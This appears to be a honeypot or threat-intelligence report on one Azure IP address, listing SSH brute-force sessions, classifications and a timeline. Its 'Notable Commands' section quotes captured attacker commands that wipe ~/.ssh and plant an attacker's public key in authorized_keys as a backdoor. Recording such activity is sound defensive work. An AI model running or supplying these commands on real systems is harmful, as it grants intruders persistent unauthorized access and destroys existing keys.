
20.228.193.165

Threat Confidence: 58%
Location: 🇺🇸 US / Washington
ASN: AS8075 · Microsoft Corporation
Cloud Provider: Microsoft Azure
Total Events: 287 (Top 10% by volume)
Agent Count: 1
First / Last Seen: 2026-04-20 20:05 — 2026-04-20 20:47
Attack Types: ssh:bruteforce
MITRE ATT&CK Techniques: Reconnaissance, Initial Access, Defense Evasion, Credential Access, Command and Control
External Corroboration: Blocklist.de (reported 2026-04-20 22:49; blocklist_de:reported)
Session Forensics: malware_dropper ×9, credential_probe ×25, opportunistic_bruter ×9
Sessions: 43 (18 with login)
Avg Depth Score: 0.43
Commands Executed: 27
Files Downloaded: 9
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints: SSH-2.0-libssh_0.11.1
Evidence Timeline
Opportunistic Bruter f4ed3eb57da9 w4m_singapore_01 · 2026-04-20 20:47
1 50%
Malware Dropper 4717b806b9e1 w4m_singapore_01 · 2026-04-20 20:47
3 1 1 100%
Credential Probe 9b6824cbb955 w4m_singapore_01 · 2026-04-20 20:47
1 20%
Credential Probe 677afb40e775 w4m_singapore_01 · 2026-04-20 20:45
1 20%
Malware Dropper cd2701761fbf w4m_singapore_01 · 2026-04-20 20:44
3 1 1 100%
Opportunistic Bruter 5ffc9df00363 w4m_singapore_01 · 2026-04-20 20:44
1 50%
Credential Probe 6439ed27176c w4m_singapore_01 · 2026-04-20 20:44
1 20%
Credential Probe 01dff75ed3a6 w4m_singapore_01 · 2026-04-20 20:42
1 20%
Credential Probe ac3b34ff9454 w4m_singapore_01 · 2026-04-20 20:40
1 20%
Credential Probe 425e0befdd20 w4m_singapore_01 · 2026-04-20 20:39
1 20%
Malware Dropper 491c37042868 w4m_singapore_01 · 2026-04-20 20:37
3 1 1 100%
Opportunistic Bruter 7b2e85863ced w4m_singapore_01 · 2026-04-20 20:37
1 50%
Credential Probe 5cba3a371c14 w4m_singapore_01 · 2026-04-20 20:37
1 20%
Credential Probe 12fd2f671464 w4m_singapore_01 · 2026-04-20 20:35
1 20%
Opportunistic Bruter 9dd312ee8639 w4m_singapore_01 · 2026-04-20 20:34
1 50%
Malware Dropper 596de2b0b8ca w4m_singapore_01 · 2026-04-20 20:34
3 1 1 100%
Credential Probe b076c86e766a w4m_singapore_01 · 2026-04-20 20:34
1 20%
Credential Probe 7764f27d3c7d w4m_singapore_01 · 2026-04-20 20:32
1 20%
Credential Probe 739eba83db7b w4m_singapore_01 · 2026-04-20 20:30
1 20%
Credential Probe a1f9dd3691ef w4m_singapore_01 · 2026-04-20 20:29
1 20%
Credential Probe bf7f91ccb5e3 w4m_singapore_01 · 2026-04-20 20:27
1 20%
Credential Probe 45efd7c0e5fb w4m_singapore_01 · 2026-04-20 20:25
1 20%
Opportunistic Bruter 45858cf0b692 w4m_singapore_01 · 2026-04-20 20:24
1 50%
Malware Dropper fac814a949c5 w4m_singapore_01 · 2026-04-20 20:24
3 1 1 100%
Credential Probe dc675d6d6f0b w4m_singapore_01 · 2026-04-20 20:24
1 20%
Credential Probe 17bb1d5d3e8a w4m_singapore_01 · 2026-04-20 20:22
1 20%
Credential Probe 128cd4bd7f87 w4m_singapore_01 · 2026-04-20 20:21
1 20%
Credential Probe 064a5b1de852 w4m_singapore_01 · 2026-04-20 20:19
1 20%
Malware Dropper 519611666e4f w4m_singapore_01 · 2026-04-20 20:17
3 1 1 100%
Opportunistic Bruter 53d7e23f9b2d w4m_singapore_01 · 2026-04-20 20:17
1 50%
Credential Probe 661036a5ac9d w4m_singapore_01 · 2026-04-20 20:17
1 20%
Credential Probe 9437a1ca02a1 w4m_singapore_01 · 2026-04-20 20:16
1 20%
Malware Dropper 5fe88f9aba82 w4m_singapore_01 · 2026-04-20 20:14
3 1 1 100%
Opportunistic Bruter 6cd6fcd32793 w4m_singapore_01 · 2026-04-20 20:14
1 50%
Credential Probe 50fcbd5310e6 w4m_singapore_01 · 2026-04-20 20:14
1 20%
Credential Probe 7a73ffbcfd48 w4m_singapore_01 · 2026-04-20 20:12
1 20%
Opportunistic Bruter 12596005180e w4m_singapore_01 · 2026-04-20 20:11
1 50%
Malware Dropper 6b5279ab80a2 w4m_singapore_01 · 2026-04-20 20:11
3 1 1 100%
Credential Probe 592b1c155b83 w4m_singapore_01 · 2026-04-20 20:11
1 20%
Opportunistic Bruter 85a1734db8c7 w4m_singapore_01 · 2026-04-20 20:10
1 50%
Malware Dropper f6e922bc4a97 w4m_singapore_01 · 2026-04-20 20:09
3 1 1 100%
Credential Probe 85b4ac312af2 w4m_singapore_01 · 2026-04-20 20:10
1 20%
Credential Probe 86a28ce94358 w4m_singapore_01 · 2026-04-20 20:05
1 20%